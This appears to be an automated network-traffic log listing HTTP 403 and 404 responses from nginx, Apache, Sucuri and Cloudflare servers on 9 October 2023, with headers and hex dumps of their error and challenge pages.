                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:50:55 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Mon, 09 Oct 2023 13:50:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 11003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:55 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:55 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:21:02 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 5377Connection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z9PrsNqkvX4lSJzVKqQOu1ZIENPA1EmEYw2Gikj1X1kH11jqnnGMcjWFXL5kGUm70YQhgQR7KGsuF%2BomD%2F0HyVEFVzZs5DyHEYPOSFR2vG%2F021S2TOWQGUQ%2FlQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8137187099895281-LAXalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><met
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:56 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Mon, 09 Oct 2023 13:50:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 11015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=usF2dKPvi%2BewiFPepDti6Ic93zRVKljxbQwnybg0V9A9oxe9ZLu4mlp0gHWt0CjjAfB5jvtJJKsvGpEQVOAww4XdRvGsYDZlzylGmOLgYuAZeENVEtqyn5Bhjm28"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371870a94c2eed-LAXalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:56 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 